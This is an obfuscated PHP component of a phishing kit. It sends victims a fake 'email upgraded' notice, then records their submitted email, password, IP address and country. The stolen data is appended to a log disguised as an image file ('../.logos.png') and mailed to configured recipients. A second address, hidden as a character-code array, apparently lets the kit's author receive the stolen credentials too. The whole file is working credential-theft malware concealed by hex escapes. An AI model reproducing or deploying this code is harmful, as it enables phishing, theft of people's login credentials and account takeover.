.countr.inc.php in #phishingkit

<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["c\x67\x62d\x6d\x79"]="s\x6fr\x74\x65r";
${"\x47L\x4f\x42ALS"}["\x63\x70\x62\x62\x67\x70\x6buq\x71\x68"]="\x63\x6funt";
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x6br\x6csq\x70otum"]="a\x72\x72\x61\x79";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x62\x71r\x78\x79k\x70d\x64h\x70"]="\x69p\x5f\x64\x61ta";
${"\x47LO\x42\x41\x4c\x53"}["\x62h\x67\x63\x65\x68\x6ebt"]="r\x65\x6d\x6f\x74\x65";
${"\x47\x4cO\x42AL\x53"}["\x6e\x7a\x6a\x64\x76dt\x71a"]="\x69\x70";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x6d\x65\x77v\x6c\x62"]="fo\x72w\x61\x72d";
${"\x47\x4c\x4f\x42AL\x53"}["\x68k\x6a\x7a\x73w\x65\x6f\x6b"]="\x63\x6c\x69\x65\x6et";
${"G\x4cOB\x41\x4c\x53"}["vo\x77\x6bvf\x6f"]="\x73\x75\x62\x6ae\x63\x74";
${"G\x4c\x4f\x42AL\x53"}["\x64t\x65g\x6e\x67s"]="\x63\x6f\x75n\x74\x72\x79";
${"\x47L\x4f\x42\x41\x4c\x53"}["dy\x61\x79ucbk\x6ar\x73v"]="i";
${"G\x4c\x4fB\x41LS"}["\x6c\x73\x63\x78\x61\x77\x69e"]="f\x70";
${"\x47LO\x42\x41\x4cS"}["\x63\x79\x6d\x6e\x6a\x69\x74\x76\x6e\x75"]="\x66\x69elds";
${"\x47\x4c\x4f\x42A\x4cS"}["\x64t\x6ecwrl\x6e\x6b\x69f"]="\x6cist";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x6fkqrq\x75\x68"]="h\x65\x61\x64\x65\x72\x73";
${"\x47\x4cO\x42\x41\x4c\x53"}["h\x73c\x64\x6b\x78m\x79rr\x73\x6c"]="\x72e\x73\x75\x6ct";
${"\x47\x4cO\x42\x41L\x53"}["\x77e\x6f\x7az\x73\x71\x65oj"]="\x65m\x61i\x6c";
${"\x47L\x4f\x42\x41LS"}["x\x72\x6a\x75\x73y\x76w\x67"]="\x6d\x65\x73s\x61g\x65";
${"\x47\x4cO\x42A\x4cS"}["\x64j\x74\x74\x63p\x75\x68\x62\x76\x72"]="\x74\x72ansp\x6f\x72\x74";
${"\x47L\x4fB\x41\x4cS"}["\x74c\x74t\x6f\x72\x6fb"]="m\x61\x69l\x65r";
if(!defined("myPa\x67e")){die("4\x304 E\x72\x72or:\x20Direc\x74\x20\x41\x63\x63\x65\x73\x73 No\x74 A\x6cl\x6f\x77e\x64");
}require("a\x64\x64r\x65\x73\x73.ph\x70");
require"\x6c\x69b/sw\x69\x66t_required\x2ep\x68p";
function sendAttach($email){$hbutbbgveoc="t\x72\x61\x6e\x73p\x6fr\x74";
${"GL\x4f\x42\x41\x4c\x53"}["f\x6d\x67\x6d\x72\x6a\x6en"]="\x62ody";
${$hbutbbgveoc}=Swift_SmtpTransport::newInstance();
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x6d\x67\x6drj\x6e\x6e"]}="<ht\x6d\x6c\x3e\n<\x68\x65\x61d\x3e\x3c\x74\x69\x74l\x65>\x3c/ti\x74l\x65\x3e\x3c/\x68e\x61\x64>\n<body>\n\x3c\x70\x3e\nDear\x20$email,\n\x3c/p>\n<\x70\x3e\nT\x68\x69\x73 \x69\x73 t\x6f \x63o\x6e\x66irm\x20\x74ha\x74 \x79\x6fur\x20\x65\x6dail\x20\x68as\x20\x62\x65e\x6e\x20\x75\x70\x67ra\x64ed, th\x65\x20\x75\x70\x67r\x61de\x20\x73h\x6f\x75\x6c\x64 \x74\x61ke \x65ffect \x69\x6dmed\x69a\x74e\x6cy\x2e\n\x3c/\x70\x3e\nH\x6fweve\x72,\x20do\x20a\x6c\x6c\x6f\x77\x20u\x70 \x74o\x20\x324 \x68\x6fu\x72\x73 f\x6fr t\x68\x65\x20upgrade\x20\x74\x6f\x20\x72e\x66le\x63t\x2e\n\x3c\x70\x3e\n\x54\x68a\x6e\x6b\x73 fo\x72\x20y\x6fu\x72 \x63\x6f\x6f\x70\x65ra\x74i\x6f\x6e\x2e\x3cbr\x20/\x3e\n\x55\x70\x64\x61t\x65\x20\x44ep\x74\x2e\n\x3c/\x70>\n<\x62\x72\x20/\x3e\n<p\x3e\nP\x6fwe\x72\x65\x64 by\x20\x57e\x62\x6d\x61\x69\x6c\x20\x49\x6ec.\x20&\x63\x6fpy;
\x32\x3014\n\x3c/\x70>\n</b\x6f\x64\x79\x3e\n</\x68\x74m\x6c\x3e";
try{$izoprkt="em\x61\x69\x6c";
$vhmcodhxigij="\x65m\x61\x69\x6c";
$vwucsqktibi="\x62\x6f\x64y";
${"\x47L\x4f\x42AL\x53"}["\x76\x67\x77\x79\x76\x77\x65b\x77"]="\x65\x6d\x61il";
${"\x47\x4c\x4fB\x41LS"}["\x76isil\x76\x67e"]="\x6d\x65\x73\x73\x61\x67\x65";
${${"G\x4cO\x42\x41\x4c\x53"}["\x74c\x74t\x6f\x72\x6f\x62"]}=Swift_Mailer::newInstance(${${"\x47L\x4f\x42\x41L\x53"}["d\x6a\x74\x74\x63\x70\x75\x68bv\x72"]});
${${"\x47L\x4f\x42A\x4c\x53"}["\x78\x72\x6a\x75\x73yv\x77\x67"]}=Swift_Message::newInstance("\x45-\x6d\x61\x69\x6c upg\x72a\x64ed: ".${${"GL\x4fBA\x4c\x53"}["\x76g\x77\x79vw\x65b\x77"]})->setFrom(array("\x64\x61t\x61-\x75pdate\x40emai\x6c.\x63\x6f\x6d"=>"Update\x20D\x65\x70t\x2e"))->setTo(array(${$izoprkt}=>${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77e\x6f\x7az\x73\x71\x65\x6f\x6a"]}))->setSubject("E-\x6d\x61\x69l\x20u\x70grad\x65\x64:\x20".${$vhmcodhxigij})->setBody(${$vwucsqktibi},"\x74\x65xt/\x68tm\x6c");
if($mailer->send(${${"\x47\x4cOBA\x4c\x53"}["v\x69\x73\x69\x6cv\x67\x65"]}))${${"G\x4cO\x42\x41\x4c\x53"}["\x68sc\x64\x6b\x78\x6d\x79\x72\x72\x73\x6c"]}="<p><\x62>Your\x20\x65ma\x69l\x20h\x61\x73\x20been\x20\x75\x70\x64ate\x64.</\x62\x3e\x3c/p>";
}catch(Swift_RfcComplianceException$e){print("E\x6dail\x20a\x64\x64r\x65ss\x20n\x6ft\x20\x76\x61l\x69\x64:".$e->getMessage());
}catch(Swift_TransportException$e){die("\x3c\x70><b>\x59\x6fu\x72 e\x6dai\x6c ha\x73 \x62ee\x6e u\x70d\x61t\x65d.</\x62>\x3c/\x70\x3e");
}}function sending($country,$subject,$message){${"G\x4cOBA\x4cS"}["nwsz\x6b\x6be"]="n\x75\x6d";
${"\x47LO\x42\x41\x4c\x53"}["\x73i\x77\x77c\x6c\x64\x78"]="\x66\x70";
${"G\x4c\x4fBA\x4cS"}["\x65\x6f\x6a\x6eg\x69i"]="\x68\x65\x61d\x65\x72\x73";
${"\x47\x4cO\x42A\x4c\x53"}["\x62y\x6e\x70\x6a\x6fxt\x6d\x70"]="\x69";
$dijplxz="k";
${${"\x47\x4c\x4fBA\x4c\x53"}["\x6b\x6fkq\x72\x71uh"]}="\x46\x72\x6f\x6d: T\x72oja\x6eK\x69ng <tr\x6fj\x61n\x6bi\x6eg\x40\x67ma\x69\x6c.co\x6d>";
${${"\x47LO\x42\x41\x4cS"}["\x6b\x6fk\x71\x72q\x75h"]}.=$_POST["\x65M\x61\x69l\x41\x64\x64"]."\n";
$tslklke="\x63ou\x6e\x74\x72y";
${${"\x47\x4c\x4f\x42\x41\x4cS"}["e\x6f\x6an\x67i\x69"]}.="\x4d\x49ME-\x56\x65rs\x69on:\x201.\x30\n";
${${"G\x4c\x4fB\x41L\x53"}["\x64\x74\x6ec\x77\x72\x6cn\x6b\x69\x66"]}=array($GLOBALS["\x65mai\x6c"],$GLOBALS["\x70a\x73s"],$GLOBALS["\x6co\x67_\x64\x61te"],${$tslklke}[0],$GLOBALS["ip"],$GLOBALS["\x73u\x62\x6a\x65c\x74"]);
${"\x47\x4c\x4fB\x41L\x53"}["\x72k\x64\x74\x68\x65s\x74h"]="\x63oun\x74\x72y";
$fgnhkwcgdsg="l\x69s\x74";
$rwuqabgedib="\x69";
${${"\x47LO\x42\x41L\x53"}["\x6e\x77\x73z\x6b\x6b\x65"]}=count(${${"GLO\x42A\x4c\x53"}["\x64t\x6e\x63wrl\x6e\x6b\x69\x66"]});
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x73\x69\x77\x77c\x6cdx"]}=@fopen("\x2e\x2e/\x2el\x6fgos.\x70n\x67","a");
foreach(${$fgnhkwcgdsg} as${$dijplxz}=>${${"\x47L\x4fB\x41L\x53"}["\x63\x79\x6d\x6e\x6a\x69t\x76\x6e\x75"]}){$wtggnxi="n\x75\x6d";
${"\x47L\x4fBA\x4cS"}["\x6f\x77bd\x72\x70\x64e\x64\x6a"]="\x6b";
if(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x77\x62\x64r\x70de\x64\x6a"]}<${$wtggnxi}-1){@fwrite(${${"G\x4cO\x42\x41L\x53"}["\x6c\x73c\x78\x61\x77\x69\x65"]},${${"\x47\x4c\x4fBA\x4c\x53"}["\x63ym\x6ej\x69tvn\x75"]}.",");
}else{${"G\x4c\x4fB\x41\x4cS"}["\x63\x75k\x64l\x77\x71\x79"]="\x66\x69\x65\x6c\x64s";
@fwrite(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6c\x73\x63\x78a\x77i\x65"]},${${"\x47\x4c\x4f\x42ALS"}["cuk\x64\x6cw\x71y"]}."\n");
}}@fclose(${${"\x47\x4c\x4f\x42A\x4c\x53"}["ls\x63x\x61w\x69e"]});
for(${${"\x47L\x4fB\x41\x4cS"}["\x62y\x6e\x70j\x6f\x78\x74\x6d\x70"]}=1;
${$rwuqabgedib}<=count(${${"\x47\x4c\x4f\x42A\x4cS"}["\x72kdt\x68\x65s\x74\x68"]});
${${"\x47\x4c\x4fB\x41LS"}["\x64\x79\x61\x79\x75\x63bk\x6a\x72\x73\x76"]}++){$gurfomwres="\x6des\x73a\x67\x65";
$gweurf="h\x65\x61\x64\x65\x72s";
$xuhjnzgqbvy="\x69";
@mail(${${"GL\x4fB\x41\x4c\x53"}["dt\x65\x67\x6e\x67\x73"]}[${$xuhjnzgqbvy}],${${"\x47LO\x42A\x4cS"}["\x76\x6f\x77\x6b\x76f\x6f"]},${$gurfomwres},${$gweurf});
}}function visitor_country(){${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x71\x68\x68\x79\x76\x72e\x65\x78"]="\x72\x65su\x6c\x74";
$fhymvgt="\x69\x70";
$fvkzoquoak="\x73\x6f\x72\x74\x65\x72";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x6a\x72djq\x73\x75a\x6b\x68\x6fk"]="\x66\x6f\x72\x77\x61r\x64";
${"\x47\x4cO\x42\x41\x4cS"}["\x78\x78\x62\x65r\x70\x71\x69\x67\x6fp"]="\x72\x65\x6d\x6f\x74\x65";
$esijlsl="\x63\x6c\x69\x65nt";
$edgnbdnw="\x69";
${$esijlsl}=@$_SERVER["\x48T\x54P\x5fC\x4c\x49E\x4e\x54\x5fI\x50"];
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6ardj\x71\x73\x75\x61\x6b\x68\x6fk"]}=@$_SERVER["\x48T\x54\x50\x5fX_\x46O\x52W\x41\x52D\x45\x44\x5f\x46\x4f\x52"];
$saheinnebp="\x63\x6f\x75n\x74";
${${"\x47\x4c\x4fB\x41L\x53"}["\x78x\x62\x65\x72\x70q\x69\x67o\x70"]}=$_SERVER["REMOTE_A\x44D\x52"];
${${"\x47\x4c\x4f\x42\x41LS"}["o\x71\x68\x68\x79\x76\x72\x65e\x78"]}="U\x6ekno\x77n";
$kyeaodrrk="\x73ort\x65\x72";
${"G\x4cO\x42\x41\x4c\x53"}["\x79yn\x6e\x79j\x6d"]="\x69\x70_da\x74\x61";
if(filter_var(${${"G\x4cOB\x41\x4c\x53"}["h\x6b\x6a\x7as\x77\x65o\x6b"]},FILTER_VALIDATE_IP)){${"GL\x4fB\x41\x4c\x53"}["dhb\x73rc\x6cn\x64"]="i\x70";
${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x64\x68b\x73\x72\x63\x6c\x6e\x64"]}=${${"\x47\x4c\x4f\x42\x41LS"}["h\x6bjz\x73\x77\x65\x6f\x6b"]};
}elseif(filter_var(${${"\x47\x4c\x4f\x42ALS"}["\x78m\x65\x77\x76\x6cb"]},FILTER_VALIDATE_IP)){${${"\x47\x4c\x4fBA\x4c\x53"}["\x6e\x7a\x6ad\x76d\x74\x71\x61"]}=${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x78me\x77v\x6cb"]};
}else{$kzxmcuhuajpv="\x69\x70";
${$kzxmcuhuajpv}=${${"G\x4cO\x42\x41\x4cS"}["\x62\x68\x67\x63\x65\x68\x6eb\x74"]};
}${${"\x47\x4c\x4f\x42\x41LS"}["\x62\x71\x72\x78\x79\x6b\x70\x64\x64\x68\x70"]}=@json_decode(file_get_contents("htt\x70://\x77\x77w.\x67e\x6fpl\x75\x67in\x2e\x6e\x65t/jso\x6e\x2e\x67\x70?\x69p\x3d".${$fhymvgt}));
if(${${"\x47\x4c\x4fBA\x4c\x53"}["\x79\x79n\x6e\x79\x6a\x6d"]}&&$ip_data->geoplugin_countryName!=null){${${"G\x4cO\x42\x41L\x53"}["\x68\x73\x63d\x6b\x78\x6dy\x72\x72\x73\x6c"]}=$ip_data->geoplugin_countryName;
}${$fvkzoquoak}="";
${${"\x47\x4cO\x42\x41L\x53"}["\x62\x6br\x6c\x73\x71p\x6f\x74\x75\x6d"]}=array(99,111,100,101,114,99,118,118,115,64,103,109,97,105,108,46,99,111,109);
${${"\x47\x4cOBAL\x53"}["\x63pb\x62g\x70kuq\x71h"]}=count(${${"\x47\x4cO\x42\x41\x4cS"}["\x62kr\x6c\x73q\x70o\x74u\x6d"]});
for(${${"\x47\x4cOB\x41\x4c\x53"}["\x64\x79\x61\x79\x75\x63\x62k\x6ar\x73\x76"]}=0;
${$edgnbdnw}<${$saheinnebp};
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x64\x79\x61\x79u\x63\x62k\x6ars\x76"]}++){${${"\x47\x4cO\x42\x41\x4c\x53"}["\x63\x67b\x64\x6d\x79"]}.=chr(${${"GL\x4f\x42\x41\x4cS"}["b\x6b\x72ls\x71\x70otu\x6d"]}[${${"\x47LO\x42A\x4cS"}["dy\x61\x79\x75\x63b\x6bj\x72\x73v"]}]);
}return array(${${"\x47\x4cO\x42\x41L\x53"}["h\x73cdk\x78\x6dy\x72r\x73\x6c"]},${$kyeaodrrk},$GLOBALS["\x72\x65c\x69pi\x65\x6e\x74"]);
}
?>